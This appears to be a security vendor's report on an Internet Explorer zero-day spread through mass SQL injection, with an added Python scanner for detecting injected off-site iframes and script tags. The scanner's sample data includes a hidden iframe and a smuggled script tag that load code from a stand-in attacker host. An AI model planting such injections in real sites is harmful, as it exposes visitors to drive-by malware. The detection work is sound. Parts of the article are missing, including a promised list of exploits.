Malware criminals were quick to pounce on the recently discovered, and still unpatched, zero-day exploit for Internet Explorer and to mount mass SQL injection attacks with it, Trend Micro researchers have found. Researchers across the industry had correctly warned that it was only a matter of time before this exploit, whose code is publicly available, was used in broader attacks. The SANS Internet Storm Center (ISC) is reporting the same activity.
The second compromised site is a Chinese sporting goods site with a traffic rank of close to 7 million. It was found to contain injected HTML code that redirects visitors to a remote site hosting the same malicious script.
Fig. 1. A webpage of the compromised popular Chinese skating/sporting goods site
Fig. 2. An image of an injected redirection to a third-party site hosting the exploit
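The injection in Fig. 2 is the usual shape of these compromises: a hidden iframe or remote script tag pointing at a host the site does not control, either planted in the page template or, in the mass SQL injection campaigns, stored in a database text column and rendered into every page that displays it. The following scanner is an added example written for this page, not Trend Micro's own tooling; the host names (shop.example, attacker.example), the sample markup and the sample database rows are constructed for illustration, and treating every subdomain of the site's own host as first-party is an assumption you should adjust for your environment.

```python
"""Added example (not Trend Micro's code): flag injected off-site references
in a page's HTML, the pattern shown in Fig. 2, and spot <script src=...> tags
stored in database text columns, the footprint of the mass SQL injections.
Host names, sample markup and sample rows below are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags whose src/data attribute pulls in and executes remote content.
REMOTE_TAGS = {"script": "src", "iframe": "src", "frame": "src",
               "object": "data", "embed": "src"}


class InjectionFinder(HTMLParser):
    """Collect script/iframe/object references that point off-site and note
    whether each one is visually hidden, a common trait of injected redirects."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attr = REMOTE_TAGS.get(tag)
        if attr is None:
            return
        a = dict(attrs)
        ref = (a.get(attr) or "").strip()
        if not ref:
            return
        host = urlparse(ref).hostname
        if host is None:            # relative reference: same origin as the page
            return
        host = host.lower()
        # Assumption: the site's own host and its subdomains are first-party.
        if host == self.site_host or host.endswith("." + self.site_host):
            return
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                  or "display:none" in style or "visibility:hidden" in style)
        self.findings.append({"tag": tag, "url": ref, "host": host,
                              "hidden": hidden, "line": self.getpos()[0]})


def find_offsite_injections(html, site_host):
    """Return one dict per off-site script/iframe/object reference in html."""
    p = InjectionFinder(site_host)
    p.feed(html)
    p.close()
    return p.findings


# Mass SQL injection footprint: a remote script tag inside what should be
# plain text (product names, descriptions, comments) in a database column.
SCRIPT_TAG = re.compile(r"<script\b[^>]*\bsrc\s*=", re.IGNORECASE)


def column_has_injected_script(value):
    """True if a database text value carries a <script src=...> tag."""
    return bool(SCRIPT_TAG.search(value or ""))


# Constructed sample page: one legitimate CDN script, one hidden off-site iframe.
SAMPLE_PAGE = """<html><head>
<script src="/js/menu.js"></script>
<script src="//cdn.shop.example/lib.js"></script>
</head><body>
<h1>Skates</h1>
<iframe src="http://attacker.example/ie0day.html" width="0" height="0"></iframe>
</body></html>"""

# Constructed sample rows as they might come back from a product table.
SAMPLE_ROWS = [
    "Inline skates, size 42",
    'Helmet</title><script src="http://attacker.example/x.js"></script>',
]

if __name__ == "__main__":
    for finding in find_offsite_injections(SAMPLE_PAGE, "shop.example"):
        print("HTML:", finding)
    for row in SAMPLE_ROWS:
        if column_has_injected_script(row):
            print("DB  :", row)
```

Run the HTML check against a crawl of your own site's rendered pages and the column check against every free-text column the site renders; a hidden iframe or a script host that appears in neither your templates nor your CDN allowlist is what to chase first, and the line number tells you where in the template (or which rendered row) to look.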
The final payload is a worm detected by Trend Micro as WORM_AUTORUN.BSE. Other exploits that also lead to the worm are as follows:
Microsoft has revised its Security Advisory with its latest analysis of the underlying flaw used in this attack. The advisory now also lists Microsoft Internet Explorer 5.01 Service Pack 4, Microsoft Internet Explorer 6 Service Pack 1, Microsoft Internet Explorer 6, and Windows Internet Explorer 8 Beta 2, on all supported versions of Microsoft Windows, as potentially vulnerable.
The Trend Micro Smart Protection Network already detects the malicious scripts as well as WORM_AUTORUN.BSE at the desktop level and provides a solution for removing the worm. We recommend using the Trend Micro Web Protection Add-On.